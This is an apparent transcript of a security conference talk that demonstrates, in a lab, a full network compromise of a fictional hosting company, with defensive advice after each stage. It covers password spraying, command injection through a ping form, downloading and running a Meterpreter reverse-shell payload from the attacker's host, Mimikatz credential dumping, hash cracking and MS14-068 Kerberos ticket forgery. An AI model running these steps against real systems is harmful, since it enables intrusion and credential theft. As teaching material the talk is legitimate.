
Hacking in 2016 - How is our systems broken?


Formal Metadata

Title: Hacking in 2016 - How is our systems broken?
Title of Series:
Number of Parts: 96
Author: Chris Dale
License: CC Attribution - NonCommercial - ShareAlike 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal and non-commercial purpose as long as the work is attributed to the author in the manner specified by the author or licensor and the work or content is shared also in adapted form only under the conditions of this
Identifiers:
Publisher:
Release Date:
Language:

Content Metadata

Subject Area:
Genre:
Abstract: From zero to hero - total domination. In this presentation, Chris Dale shows how a typical network is compromised through multiple levels of exploitation. The talk is very demo-intensive and hands-on, demonstrating how an attacker with extremely limited access to an organisation is still able to get a foothold, even with no apparent vulnerabilities present. Once a foothold is gained, the attack surface increases. The attacker uses the increased attack surface to compromise further into the organisation, eventually gaining all the keys to the kingdom. If you are curious about how a hacker accomplishes their goals, how they work and the attacks that take place, this is the talk for you.
Transcript: English(auto-generated)
Alright, I think we're good to go. So welcome, welcome, welcome. This talk is a demo-based talk, so it's gonna be a lot of hacking, it's gonna be a lot of keyboard activity, there's gonna be demos, alright? So things might break, don't worry, usually we fix it, okay?
Don't feel bad for me if something breaks, if something doesn't work, don't worry about it, I don't. This is hacking, things tend to break, okay? Normally things run okay, but still, we're gonna mess around with some memory stuff,
we're gonna mess around with backdoors, things can crash, and so on. So I'm Chris Dale, I'm not Moriarty, Moriarty is a supervillain from the Sherlock Holmes books and videos, right? He's, in this case, the super hacker, because how can Moriarty always stay one step ahead
of the good guys? How is he always one step ahead of the detective Sherlock Holmes? In my opinion, it's quite obvious. He is the super hacker, and he has access to all the systems, all the back ends, so he knows their plans, he knows what they're gonna do, when they're gonna do it. That way, he can stay one step ahead.
So hacking is awesome, it's the way of the future for terrorists, for criminals, and that's why we also need to educate ourselves within cyber security, only because it's so tremendously big and important. My daily job is penetration testing, incident response, normally some people laugh when I say penetration testing, because it sounds kind of funny, but it's basically just ethical
hacking, professional hacking, right, so I try to break into customer systems in order to determine the business risk involved with those systems. I'm also a teacher for SANS, so I travel around the world, teaching hacking techniques and incident response and exploits and stuff like that, so I have a good time teaching
all around the world, like Saudi Arabia was my last destination, like crazy everywhere they send me. So it's pretty cool. In my spare time, I also do a lot of hacking, so I'm actually lucky enough to have my hobby as my day job, because I always like to hack, and some of the results from hacking have been
medals and prizes from different competitions, for example, I went to Washington DC to play in what we call a tournament of champions, previous winners of capture the flag events, like competitions for hacking the most servers within a certain time limit. I went there and I placed 20th out of 164, that's not too shabby, but still, there
is a lot of community within information security, and if you want to get involved, please do so, because we need people, we need bright people, and especially people who have developer backgrounds to help us actually combat the techniques and tools that the bad guys are using.
So this talk, basically, we're going to be hacking, right, as I said, we're going to be hacking servers, and Moriarty is going to start out at a web server, so we're targeting an organisation called Leet Host, it's a hosting provider, and this organisation is actually quite secure when it comes to their external network, so they've had a lot
of penetration tests happening, however, we're still going to look at how we can break in, so we're going to find the vulnerability, we're going to hack the web server, we're going to upload backdoors, and then we're going to make our way into the domain, and eventually, we're going to try to get keys to the kingdom, which is the domain administrator, right, so domain admin is like, when you have that, you can control
the entire business. So my demo environment is quite simple, on my laptop, I have everything virtualised, I have my attacker, a Linux box, which is basically just Kali Linux virtualised, it's on the same host-only network as a Windows Server 2012, which has a web server and a database
on it. Kind of standard set-up, right, and behind that, so this is a DMZ, behind that I have my domain controller, which will serve the users, will serve policies and such on. So as I said, it's a demo-based presentation, so why don't we just get on hacking, huh?
So let's start with looking at the website, like that, just let me fix my presentation mode a sec, let me duplicate the screen, looks good, so this is it, right? This is everything that is exposed, and let me challenge the audience.
What would be your initial thought on how to hack this form? Anyone like SQL injection, yes! So we're not going to do that, nope, because that would be easy, okay? So not too many customers today have SQL injection in their login form still, because
customers, they tend to get audited and pen-tested on their external networks, so a lot of people have been slamming these services and log-in forms already auditing for known vulnerabilities, right? So instead, we're going to look at something called username enumeration and password spraying,
because what does most, every single system have on the internet? They have log-in forms. If you can have a list of usernames, and if you can find just one user with a bad password, you will extend your attack surface of that system, and a lot of customers today,
they will only have their external site pen-tested because everyone already authenticated is trusted. We trust our users, right? That's a big mistake. All right, so let's try to log on with something like admin admin, right? I always try to figure out the system before I try to hack something.
You will always see some new hacker immediately trying to hack something before he even understands what the system is doing. So first of all, we try to see what this system is doing, and it says, look, the log-in failed, check your password, right? That's interesting, not too subtle, but that's interesting that it says check your password.
So what if I type in a random string? Blah, blah, and this C, test. It says log-in failed, check your log-in name (parenthesis username). So that's interesting, right? It's very explicit in this example, but by actually testing admin and a username that we know doesn't exist,
we could immediately see that, look, we know that admin exists. So now we can use our word list to check which other users exist. For example, I could scrape the LinkedIn page of all the employees of the business and try first names against last names and so on to see, is there any usernames that
exist in this system? If there are, they might have a weak password that we can attack. So we're gonna default back to attacking users. It's always the easiest way in somewhere. So how do we go about attacking this? Well, first of all, I need to have a proxy set up.
A proxy is just a tool which will capture all the requests from my web browser before they are being sent to the web server. Let me demonstrate. I'll try log-on again with like admin, admin, and right away we can see that, look, it has captured my request to the web server. I'm posting some data, I'm posting username admin, password admin, let's go.
So this request, when I press forward, this is what will be sent to the web server. And now I can edit it and I can do whatever I want. But the interesting thing to do when doing a username enumeration is using what we call a fuzzer. A fuzzer is just a tool that will try multiple different types of values
within a short time span or whatever time span we set. So I just sent my request, my login request, to a fuzzer and let me edit my little request. First of all, let me remove the cookie because the cookie is going to make the web server have some kind of state on me.
I don't want that. I want every request to be a fresh request. And then I'll define that, look, this little value here, admin, I replace it with some special characters, meaning that this value should be replaced with whatever payload I set. Whatever value I want it to be replaced with, it will be replaced.
And let's look at some values to replace. So I have a little text file with different usernames, known usernames from Linux systems, like phpBB and so on. Just a list of typical usernames, okay? So I've just loaded these in here and every single one of these text strings will be replaced within here.
Right? Quite simple. So these values down here are testing. Then I need to do some quick options because this logon field is kind of special, so it has some funky settings, so I need to process redirections and I need to process cookies.
And basically, that's it. Let's see what happens when we press attack. Oops. It's not going to take 10 minutes, don't worry. So immediately you will see that my system is now trying to log in with different usernames, boom, boom, boom, boom, boom, boom. Just different usernames, go, go, go, go.
All with the same password, admin, right? So we're not really trying to log on with any users, we're just trying to see what the error message is. Let me demonstrate the error message in my tool. Log in failed, check your password, right? That means that this username of admin exists.
And also notice that the content length of this request, the request, the response, sorry, coming back from the web server is 1472. Well, all the other ones are 1485, right? So we have an outlier. So let's sort by those and see, look,
suddenly we have a pattern of what we can assume is known usernames within the application. That is a really interesting thing to find. However, most pen testers today, they would classify this finding as a low, maybe medium risk finding in your application. And they probably won't recommend you to patch it immediately.
Well, perhaps it should, we'll see in a minute, right? So now that we have a list of users, let's take those users and add them to the list again. In our fuzzer, let's define another value, the password field.
Now we want to try all the known usernames against weak passwords. And typical weak passwords will be like, for this case, it will be LeetHost2016, Summer16, LeetHostSucks16 for those that don't like their company and their employer, and so on. So let me show you how I can change my attack
that for every username, I will try a full list of passwords, okay? So I'll change my attack to what they've dubbed cluster bomb attack. Sounds fancy, right? And I'll give it a list of passwords. So these passwords in here, those are just like abc123, access admin, admin123,
change me, change me is actually a lot of places for default configuration on switches and routers and stuff. It's quite, quite nasty. So just a series of passwords, right? Oh, let's try again. So you'll see, it's trying for every username now,
it's trying the password AAA. And then it starts doing abc for every username. Oh, sorry. So it's just trying to log on, right? And how do we determine who is logged on? Well, again, we just sort by the length to see what is the difference? Who is the outlier here? And immediately, we see that the payload on the left side,
Gordon B, username Gordon B, seems to have the password abc123. And let's check. Let's check what responses have come back from the web server. Let's do the render. Ooh, dun-dun-dun-dun-dun-dun.
Ah-ha, it says greetings, Gordon B. So a very simple attack showing how we could actually find a user to gain a login with. Let's see, Gordon B. Actually, this is still hanging in my proxy, so let's go back here. Let's try to log on with Gordon B. Gordon B, abc123.
And it works, right? So suddenly, we now have an increased attack surface. And this is important because this is the place most businesses forget to test. So in my pen-testing endeavors, I always ask to have credentials from a user. Like, give me a test user
so I can test within the application itself, because we need to assume that the bad guys already have access to our internal network and our external applications as a login user. We have to assume that. We have to assume the worst. And most likely, they do have some kind of access if they want access.
So we got some functionality here. We'll look at that in a second, but just a couple of quick PowerPoint slides. So how do you protect against this? Well, we could simply shun users or IP addresses that make multiple failed logins, right? That could be really problematic, especially when you have big customers that are all coming from one IP
and they're using your system and they might have like 200, 300 failed login attempts per day, for example. So you can't just block someone per an IP. You could implement CAPTCHA. You know, these little forms that will ask you questions like, find a cat. Whoa! Oh, nice. So we got one guy giving me a heads up.
Look at this stuff. And all the rest of you are like, ah, this guy is making a fool of himself. But let me try to duplicate it and do an F5. And we need to go, I actually shouldn't do F5. I should actually do the button. So where you have to figure out the pictures of the cats
and you click the cats and you can log in once you have done those things, right? So that works somewhat, but we can break those as well. So it helps adding an extra layer of security. You could make the attack really slow. So the login form could take a really long time to process.
That is actually good practice. As developers, you guys should make the login forms take a long time because the password algorithm that you're using to hash the passwords, hopefully you are doing that, should be slow. It should be slow. It should take like a second or two or three to create the password hash of the user's password.
So that compare should also take time. And of course, two-factor authentication would definitely break this attack, most likely, right? If I had to steal someone's phone, it would be harder. So with that, we can now see what else exists on this web server. And I'd like to remind you though,
this could be game over from here. We have Gordon B's username and his password, right? What is the chances that Gordon B is using a different password for every single service he is using? It's quite low, right? I actually do it. I have a password manager and I have like unique passwords for everything.
So I could actually show you my Facebook password and it wouldn't really hurt anyone because it's like this long. And if you could remember that, I would love to have you hack me like that. That would be cool. But think of like VPN endpoints. A lot of businesses have some kind of VPN login somewhere. Could you just log on with Gordon B, ABC123
on their VPN and have internal access to the network? I think you could. Most likely you could just port scan their network, find their VPN endpoint, authenticate and it's game over. Could be that easy, right? But no, we're gonna look at this web application, we're gonna find some exploits and we're gonna see how we can use it
to gain a backdoor on the system. So let's see, back to the web application. Let me do this, like that. So we seem to have some kind of functionality here, right? It looks like a control panel of some sort.
We can ping a server, we can do a user search and we have an about us page. This about us page is interesting because it says that if you're worried about security, you shouldn't be because they have everything in order. Really, you're laughing but if you think about it, what is most vendors saying to you today?
Oh, you look security worried about it? Don't worry, we have like the best teams in the world, they're all on top of everything. All right, so there's some interesting vulnerabilities on every single page here. That's, all right, so I know the developer who made this. It might be me, but there's some interesting parameters up here that's interesting.
The user search might be connected to a database so there might be some SQL injection going on. However, for this audience, because most of you aren't security people, I'll be demonstrating the ping a server hack. So in this example, it says enter the IP address you want to ping and there's a list of the IP addresses
that most likely, those are mine, right? Those are Gordon B.'s IP addresses. So always, the first thing we do, try the functionality and see how it works. So we click ping, ping that IP address, one of the lists and it gives us the reply. And this reply is kind of familiar, isn't it? What does it look like?
It looks like ping, yeah, but it looks like ping from Windows, like from the Windows command line. So immediately we're thinking, aha, the developer probably didn't want to write his own ping in PHP or .NET, right? So he just made a system call down to the OS and made an OS ping for him
and just read the response from that. Really good idea because then you don't have to rewrite functionality, you can basically just reuse it and should be good, right? So let's try something else, like an interesting IP address to ping would maybe be like localhost. Can I ping something else that isn't in the list? Just to learn, right?
I'm interested, I'm curious. Aha, I get four replies from localhost. So it looks like I can ping anything. So I could perhaps try to ping Google if it was online or I could ping anyone. I could tickle you with a ping if I wanted to. But do I really want to do that? No, let's try something else. Let's try to add parameters, like only ping one time.
Does this work? And immediately I got a response. Much quicker, right? Aha, so I can actually add attributes to the ping command. Hmm, what about Windows and Linux, Solaris, and most likely all the OSes? They have a way to concatenate commands.
So if you have one command on the left side, if that runs okay, run this command. Let's try that, let's see, let's see, let's see. The ampersand will concatenate another command. Let's try like dir, like show the directory contents. Aha, suddenly we have like some kind of code execution,
right, but we're limited to the commands in the OS. So what would be like, from here, how would you hack this server? You can run any command on Windows that you want. How would you do it? Say what? Python, yeah, definitely try Python. But we're on a Windows box, and,
so let's try, let's try PowerShell, right? Yes, let's try PowerShell. By the way, if this was Linux, this would be game over from here, okay? We would do like a netcat backdoor and we would have a full functionality backdoor within two minutes, right, from here. But we still have like 40 minutes to go, so.
So I'll do PowerShell command, and I'll do the ls command, which is basically the same thing as dir. PowerShell dash command, ls, and suddenly we have the same type of input. So now we have a programming environment at our hands.
The attacker can now basically run any programming, PowerShell programming command, cmdlet, that he wants to, and that gives us flexibility, right? That gives us a heap of flexibility. So let's see if we can find something interesting. For example, which user are we running? Like, can I do like ls percent user profile?
Can I expand variables? And it looks like it can. Looks like we're running as a user leetweb.leethosts. So leethosts, like, missing a seven in there. I wonder why. It was a typo when I set up the server. I noticed it like when I started my demo,
and I'm like, why is there a missing a seven? I'm so stupid, I was thinking. But right. So we can now agree that this is quite dangerous, right? We can run anything, and we can get responses back with PowerShell.
So let's do a quick recap of what actually went wrong here, and how we can defend against this type of attack. So first of all, developers made a mistake. They didn't properly sanitize the input coming from the user. They didn't think that you could actually break out of the command and actually do different stuff.
So there should definitely be some whitelisting and filtering going on, for sure. A web application firewall could have rules preventing this type of attack. However, in most cases, we're able to bypass those. Okay, it just takes a little bit more trying and failing, and we can most likely bypass web application firewalls. But they're still nice to have, don't get me wrong.
Also, web application firewalls support whitelisting, so you can set up a regex saying that, look, an IP address should only have like three numbers and a dot, one to three numbers and a dot, and so on. That would be really hard to hack, wouldn't it? If the only characters that you can input into that field was numbers and dots, I don't know how to hack that,
so that's definitely something good. What about source code analysis? You could have tools, there are lots of tools out there, free and commercial, that will automatically scan your source code looking for known weaknesses, like, oh, here's a blunder. This is most likely a blunder because you're using the exec command, for example.
It's very dangerous. Oh, you have a cross-site scripting vulnerability because you're not filtering. So there are tools to do that for you. And of course, penetration testing would definitely find this. I mean, if your pen test team doesn't find something as open as this, yeah, you should have a refund, to be honest. And there's the vulnerability scanning parts,
which is basically a tool that will try to simulate an attacker and see what's going on. But still, we're not done yet, right? We need more access. We, Moriarty, he's quite crazy, so he's not gonna give up from just having some kind of remote command execution. He wants full access.
So preferably, we want to have RDP, okay? Some kind of GUI, just so we can show that the mouse is moving around and things are happening, okay? So let's see how that works. So bring up my Firefox. So how would we go about uploading a backdoor?
What's that all about? Well, first, we need to create the backdoor. We need to create some kind of malware slash virus to actually help us out. That's quite simple. So it's actually super simple today because as they do in the developer world, they also do it in the security industry.
They try to make things as simple as possible to show the impact of something, right? So right here is my server. I'm not gonna touch that because that would be cheating. But here is my Linux. Hopefully, things are working. You never know, but let's see. Actually, there's some debugging from before.
Let me check my IP address. Looks like I'm on the same network. You can all see that, right, in the back? Is it okay, size? Good stuff. So I'm on the same network, so I should be able to ping one or two, 68. Looks good, right? So in Kali Linux,
there is a tool called msfvenom. It's packaged within a framework called Metasploit. msfvenom allows us to create viruses. We can create PowerShell viruses, Visual Basic viruses, Linux viruses, and executable files.
So let's create an executable file. Let's see if I have, nope. So I have a little cheat sheet. I'm gonna copy-paste some things just because it makes things easier. You guys don't wanna show, you don't really wanna see my typos going on everywhere. So let's paste that in here. So I'm telling my little msfvenom tool
that I wanna create an executable with the payload, meterpreter. Meterpreter is an in-memory rootkit for Windows. It will allow me full access to the system, with the permissions of the user that is running us. So that's the first part here. And then we have a remote connection coming back to us.
So we're telling anyone who is clicking our file that we will be creating now, they should be connecting back to our IP address. So normally this would be an online IP address, right? I would have my domain name in there. I have a special pen-testing domain name which I use for this stuff. And which port they should connect on. So this will bypass every single firewall rule
in the world, most likely, because people are not filtering where they are allowed to go on the internet. Most of the people aren't. And we'll put this inside our web server. So let's see, can I actually visit this, my own attacking machine now and see if there's a backdoor.exe?
Yes. So when I visit my little URL from the attacker machine up here, this is my Linux box, we have our payload ready, the executable is ready to be sent somewhere, right? How do we get this file on board? Well, with PowerShell,
maybe some of you guys know this already, but you can actually do just about everything with PowerShell, okay? So we can actually do a simple command called Invoke-WebRequest. And it will actually pretend to be a little browser and it will go out online pulling down whatever file you want. So that's interesting. Let me copy that little command as well from the cheat sheet
just to make sure we don't have typos. So I'll show you. So we do the PowerShell, this is our command injection, right? We have powershell -command Invoke-WebRequest, really nice cmdlet, and we point it to our attacker IP address. We point it to the backdoor.exe,
I'm sorry if it's a little bit small. And we say, look, this file should be written to the user profile, which is people's home directory, right? Users slash leetweb.leethost and so on. And we'll name the file backdoor.exe. Let's see what happens. Did I click?
Oh yeah, I did click. Looks like it clicked. Let's see if we can see if the file has been written. So we'll do ls %USERPROFILE%. And voila, we now suddenly have a file on the system. We told PowerShell through the web server
to, hey, go out to the internet, pull down a file, pull down malware, and store it on the system. But we haven't executed anything, have we? No, we just downloaded it. Before we run it, though, we need to set up a server. We need to have some kind of way to process a backdoor coming back to us.
So for that, I'm gonna be using the Metasploit framework. Basically, it's a framework for hacking. Makes things simple. Let's see if we can find it. Should have it up in the background here. We have some options, just verifying that everything is looking good.
And I'll set up my little server. So this server will just wait for anyone who is trying to connect back to me with the virus I've created. And if they are clicking on a virus, connecting back to me, we should interact with it and have some kind of remote control.
So let's see what happens if we click the file. Huh, you click the file. Well, you don't really click the file, but you run the file, right? You use PowerShell. Don't even need to use PowerShell. Let's just do & %USERPROFILE%\backdoor.exe. This should run the command, shouldn't it?
Just like you would run ping from System32 or a Windows folder, this should run this executable. So let's see. It's just hanging. Oh, it doesn't return anything, right? That's interesting, because it's waiting for this executable to complete.
Just like it was waiting for ping to complete, it's waiting for backdoor to complete. And backdoor is connecting back to me. So let's look at our Linux and see if we have anything going on. Oh, we do. It says, look, meterpreter session two has been opened. You have an incoming connection from this web server.
Interesting. Let's try to interact with it. Suddenly, we have command execution from a shell. So we can run dir, oh, sorry, ls. We can type getuid, for example. Or let's do help. Let's look at the commands we can actually run from this. So I can kill any process that I want to.
I can migrate my process so instead of being inside the Apache web server, I can migrate the whole rootkit, the code of it, through memory into, for example, explorer.exe. Because explorer.exe is never closed, right? So it's gonna persist my malware, ensuring that it won't get closed when someone reboots the web server
or a thread or an application pool dies, for example. So very nice functionality. I can cat files, I can remove files, I can upload files. I can do typical networking commands here. And some interesting ones are I can do a keyscan_start.
This is a key logger. So I can just start the key logger, have it running for 24 hours, dump the output tomorrow, and I'll have whatever is typed on a keyboard from the server on my system. That's really, really nice. I could even, if this was a client PC, right? If this wasn't a server, I could activate the web camera
and take a little snapshot of whoever's sitting behind the screen. I could even have a stream data from me. And I've done this a couple of times, specifically for TV2, a big news channel in Norway. And I've done it against Sturla Dyregrov, a news anchor. He asked me the day before my interview, he asked me, hey, is it like, can you hack my Facebook?
Is it simple? And it's not really simple to hack Facebook, but it could be simple to hack you. Are you giving me permissions? And he's like, yeah, well, yeah, why not? Yeah, for sure, I got a screenshot of him. His face is kind of, ah. And I also did it to another reporter in TV2. And they're using this material, actually, for internal training right now
to try to educate people better to don't click viruses, basically. So lots of different cool commands we can do from here. So this is our backdoor running, right? And that's all nice and good. But let's look at some defenses from this. No, wait, we told you that we're gonna gain RDP.
Sorry, this is not RDP. This is only like a command access. So let's look at how we can get some RDP action here. So on a system, the first thing an attacker will do, if it's remotely good, okay, is going to try dump the password hashes from the system.
That means it's gonna try to gain the passwords, but they're not in clear text most of the time. They're hashed. So he wants those so he can start cracking them to try to gain passwords because they can be used elsewhere as well. So for that, I want to upload some file, some files.
So my little tool here, my Meterpreter, my little backdoor, supports uploading files. As we saw in the help list, I could simply say I want to, did you see that? I should be offline, so I don't want any emails popping up, like, hey Chris,
it was really fun last night. I don't want that stuff to happen. So I'm going to be uploading my kit, my files. I have a little zip file, right, with all my hacker tools that I want onto the system. Most attackers or hackers, they have their own kit. And we'll upload a kit because it has some interesting features.
Let's see, it's 18 megabytes, it's fine. And it looks like it uploaded. So from here, I kind of like going back to the Windows command line. So I'll type shell, and look at that, we have the Windows command line at our service.
So from here, I could do cd dash dash, cd dot dot, cd dot dot, whatever. I could do there, I could do cd users, I could do cd leetweb.leethost. I could type dir, and I could see that, look, I have my files uploaded. So here's my backdoor that we're currently running, right? We're inside this backdoor.exe,
but just uploaded these files from my Meterpreter. So it's a zip file, right? How do you unzip from the command line in Windows? What? You wish, you wish it was just like unzip, like it would be in any other operating system, like Linux, for example. Let's try unzip.
There's nothing that will help you unzip on Windows from the command line, except PowerShell. And I'll be honest, I'll be honest though, I'm not gonna try type this command because it's hilariously long. Look at this stuff. This is unzipping from the command line in Windows.
If anyone ever has a better way of doing this than this way, let me know after my talk, okay? But this should hopefully extract my files. And look at that, we have our files extracted. That's good stuff. So inside here, I have a tool called Mimikatz. It's from GitHub, that's fine.
It's a really nice tool that will try to look through, it will scrape through memory, looking for passwords in clear text and in a hashed form. This tool is actually very, very nice for attackers to use. Let's run it.
I believe we need to have the debug privileges. Oops, that's a typo. That's why we do the copy pasting, right? privilege::debug. So that means I'm granting this tool to have debug privileges inside Windows.
And I know there's a lot of .NET developers here. So you might know what the debug privilege means for a user in Windows. Local administrators normally have debug privileges. It means that a process can interact with another process, debugging it, and also having its code run inside other processes' code
and even access the memory space of those processes. So that's what we're doing here. If we didn't have local admin in this case, it wouldn't happen. So let's cover that in a bit, okay? Then we'll do sekurlsa::logonpasswords. Again, typo.
Let's just do the copy pasting, Chris. It's no problem. Much easier to just do copy paste. We'll tell Mimikatz to look for logon passwords. And we have a long list of outputs. Let's look at these things. The first thing we have is an interactive logon to the computer from the administrator.
And this user has no password. Interesting. There is a hash here that we could crack or we could use as an authentication mechanism. But still, there's no password in clear text. That's because Windows Server 2012 R2 actually has something called protected admin. So they try not to store the user's clear text password
in memory. So it's a really good security feature added by Windows. And let's look for different things here. Oh, look at this. Suddenly, we have the web user, the password in clear text. Because that user wasn't covered
by the protected admin module. So Mimikatz simply took the password straight out of memory, and we could use this for remote authentication. That's no fun, is it? It's just having the password in clear text? Nah. So this NTLM hash that I've highlighted is the password representation, right?
So let's just pretend we don't have any clear text password, okay? Let's crack this little sucker. So for cracking, I will be using a tool called Hashcat. Hashcat will interact with my GPU, and it will try super many.
It will actually try to crack, it will try to crack 66,000 plus three zeros, like 66 millions, 6.6 million passwords a second. It's gonna try cracking the hash.
So I have a word list, right? With 58 million words in it. My word list will be what we call mangled. So I'm gonna try Leetspeak replacement. So every I will be replaced with a one. Every, I will add exclamation marks. I'll automatically add like 2016 behind every word,
and I'll crack it. And running this GPU cracking tool, it's super quick, and we can see that the password cracked almost instantly. This hash, which I copy pasted, represented the password manager 007. So really, from here, all we have to do, hopefully,
is try to authenticate. Oh, that's the domain controller. Let's see. User name is correct, so let's do manager 007. Aha. So we can suddenly log on to the web server. That's cool. And as any good attacker does,
the first thing you do when you hack something is you bring up the terminal window. Because you don't really need a GUI, right? You really don't need a GUI. Let's see, yeah, so we are running as this user, let's see, leetweb. So that's interesting. We can now browse through the system. We could look for network machines
if there's anything on here. Look through your local disk. Look through the scripts that are hosted from, for example, Apache. So we can basically do whatever access this user has. From the GUI, a lot of people appreciate the GUI, but we don't really need it, as you've seen. So let's cover some defenses for this,
because it's kind of important. Kind of important not to have this happen to your environment. First of all, believe it or not, antivirus could help, all right? It could help. So we'll bypass antivirus, no problem, okay? Any time of the week, we'll bypass antivirus.
However, we're lazy. Attackers are very often lazy. So they'll get caught a couple of times by the antivirus while they're trying and failing. And that will create alarms in your environment. So hopefully your IT operations will actually react to those alarms, and check out why this web server
is acting strangely, right? Also, your firewall rules should never allow a server to talk to the internet. Why would your servers be allowed to talk to anyone on the internet? It's quite stupid. You should allow connections coming in, and you should allow your server to reply to those connections.
That's a stateful firewall, right? But you should not allow this web server to initiate connections to anyone on the internet. That's just bad practice. And again, our user, the web user, was a local admin. And that's interesting. Why was it a local admin? Well, turns out that IT operations have big problems with permissions.
Windows permissions is hell. And basically to fix the problem, they just gave the user all the permissions, and it worked. And they're like, ha, that's convenient. And they lost it like that. But this user is not domain admin, okay? So he doesn't have any access
except access to the web server. While domain admin access means access to the entire kingdom, keys to the kingdom, okay? So we're gonna go back to the demo and look at how can we use our access to elevate our privileges to become domain admin.
That's our next goal. So let's look at this server again then. We'll be using, we can use, let's see, close this one. I think we can just use the RDP. That should work because, I mean, it's a legitimate connection, right? We are the hacker, we're on top of the server.
So let's see, let's go back to our files and see which other files we have on our system. So when I uploaded files, my little toolkit, my kit, we also uploaded something called PyKEK. Does anyone know what PyKEK is? It's a Python Kerberos exploit kit.
And Kerberos is the authentication protocol for Microsoft and Windows machines, right? Microsoft Windows machines. Those are most likely all using Kerberos for authentication, it's quite a good protocol. However, in 2014, late 2014,
there was a Windows update patch. You guys know those, right? Windows updates? They're kind of important, actually. There was one patch, MS14-068. So 14 means that it was released in 2014 and 68 is the number they've given it. It was a vulnerability that allowed anyone
to create a fake Kerberos authentication ticket pretending to be domain admin. Huh, that is bad. Any domain user can suddenly become king in your environment. Can you imagine that? If you don't patch that immediately,
any willy-nilly script kiddie or anyone who wants to take full access to your kingdom could do it, just like that. And I'll show you just like that. It would be kind of embarrassing if this demo failed right now. As I probably, it's just gonna be like that. I mean, I can't do it, right? So let's run up PyKEK and let's see what it's all about.
So I've downloaded the proof of concept code that will allow me to run this code. This little file, I'll run it first. Let's see how it behaves. I think we have time, looks good. Ooh, sorry, Python.
So this script requires some parameters. First of all, it requires the SID, the user's SID. Then it needs to have the domain controller's IP address and the domain we're talking to.
So the SID is basically this long string up here. So it's no secret. It's just your unique identifier to the domain. So it's not really a lot of advanced stuff going on here. So I'm going to give these parameters to the tool. Let's see if we can create a ticket.
And it requires a password. So that's the interesting thing, right? We need to have some kind of password in clear text. And our password was? Yes, manager 007. I had my demo fail once because I typed in master 007 multiple times. Manager 007, I will never do that mistake again.
So it gives us a lot of done messages. Looks good, right? We type dir and we have a little file here. This file is basically a ticket granting ticket. It's basically a ticket giving us authentication. But it's just as a file, right? We need some way to load it into the system.
Actually, we'll be loading it into memory. And we'll be doing that using a different tool called Mimikatz, which has a lot of Kerberos interaction modules as well. So Mimikatz supports interacting with Kerberos tickets and we'll use Mimikatz to push this ticket inside our memory.
So let's cd into the correct directory. Oh well. Mimikatz shrunk. So Mimikatz can be run interactively or it can be run from the command line.
Right now, I'll run it strictly from the command line, giving it the parameters to pass this ticket into memory and I'll point it to SQL slash users and our user, the user file I just created, the ticket file and I'll exit immediately. Let's try this. Actually, wait. Before I do, I promised you I wasn't domain admin, right?
Challenge me. Like, no, he's lying, he's probably domain admin. All right? Yes, I'm not a domain admin. So let's check, okay? Let's do check net user group domain admins and see. The users in the domain admin group is administrator.
Only one user, right? Let me try also net use. Let me copy that command because my host name for the domain controller is hilariously bad. Let me try to mount the C drive, okay? The C drive of the domain controller. You shouldn't be able to interact with that drive
and browse the files unless you have permissions and as you can see that it's giving me the prompt to enter your username and password. That means it already tried your credentials as the leetweb user and it didn't work so please give me the permissions. We'll cancel out that and that's a proof of concept. I just showed you, we don't have access, right?
And let's now load this little ticket into memory. Let's see, there it is. Looks good. Did you see that? You never know what kind of information
you will be showing people. So I just listed out my tickets and to be honest it looks good. Let's try the net use again. Basically I'm mapping a network drive. Nope. Let's see, win, win, win, win, win, win, win. Okay, let's do this again. I just removed all tickets.
Oh, it doesn't work. So I said it would be embarrassing if it didn't work and it's actually quite embarrassing right now. But just give me a second to debug. Let's see, let's see. We have, let's see. I think we need to look at our ticket. Let's see how our command ran. Let's see. This one, let's see. We're giving it this Python script.
We're giving it a username, a domain. We're giving the SID, and I verified the SID early today, it should work. And the domain, leethost. So that should work. Let's actually create another ticket because I think something went wrong. You never know. And these things, they've been written to be easy
but they're not like super robust. You never know, right? Let's see. It's running one more time. Nope, wrong command. Let's see, we have our command up here. This one.
And to be honest, it looks good to me. Manager 007, that's my password by the way. So check it out, try out my LinkedIn and so on. I'm just kidding. And yeah, it did say done on everything. So let's go back to Mimikatz. Let's try it one more time. If it doesn't work, I'll show you guys still.
So don't worry about it. So, now I want to purge my tickets first. Just remove all the tickets, all the authentication tickets you already have on the system. Just remove those so you have a clear, clean slate, right? Looks good, leetweb, leethost.
Would be cool if it actually works. The honest truth though is I tested this like 30 minutes before I came down here for a demo. And I rebooted just to make sure that there wasn't any caching going on. Ah, and it worked, right? Nice, thank you, thank you.
Nice, nice. So let's browse the domain controller. Let's look in the Windows directory. Let's look in system 32. Let's look for a very specific file that is called ntds.dit. This file, 8.4 gigabytes.
What file is this? AD, this is Active Directory, okay? Copy this file back to your own system. You have all the user hashes of all the users in the domain, all right? Let's just look at a couple of things here. So, what went wrong?
We forgot Windows Update. I have clients that refuse to patch domain controllers because they are afraid they will crash while they are doing so. If the domain controllers go down, everything goes down. So their most vulnerable service in the entire organization, multinational companies,
is the domain controller. So I had them patch this, specifically this. I forced them to patch this. So definitely, Windows updates matter. But I want to bring up a scenario which I'm not gonna demo because it takes a little while. But with this AD dumped, I have a very specific, special user's password hash,
the krbtgt user. This user is a user that creates tickets. If I have that user's hash, I can basically create tickets to my own on demand whenever I want to. And I can create tickets that will grant me 10 years,
for example, of domain admin to your environment. And how do you fix that? Well, it turns out that if you change your krbtgt hash, the password, if you change the password, two times my ticket will be invalidated. And I would have to hack them again and dump the hash.
But two times, it goes two times because the password rotation and the history, it has to rotate so it doesn't remember the hash I had when I dumped it. If you try to reset that user two times, you're gonna have hell. It's not gonna be pretty. Your Lync is gonna die, Exchange is probably gonna die.
You're gonna have stuff happening that you can't explain. Because so many things are relying on having week-long tickets in their systems. So when suddenly all the tickets are invalidated, things stop working. So normally you would have to wait a week and then reset the second time, giving the attacker a lot of time to regain his foothold,
dump the hashes again, try to compromise different users, compromise domain admins that didn't reset their password, and so on. It's really, really hard to recover from. All right, so I think we're on time. Are there any questions? Because we have five minutes, don't we? Five minutes, yeah?
Are there any questions on these hacking activities? I expect there to be questions because I'm Norwegian and you're Norwegians and everyone is saying that Norwegians, they don't ask questions. So bring it on, come on, go. Ooh, definitely you could, but not on a domain controller.
So this patch is for the domain controller, but I love the idea, though, to uninstall the protective mechanisms. We do that for AV sometimes when we have local admin. Good question, right? Are you a Norwegian? Ah, represent.
Nice. Anyone else before we finish? Okay, go. So very valid question. So this tool is open source, so you can go manually and review the source code. For many of my tools and my team, we actually do source code review before we use tools, especially new tools that have just been released.
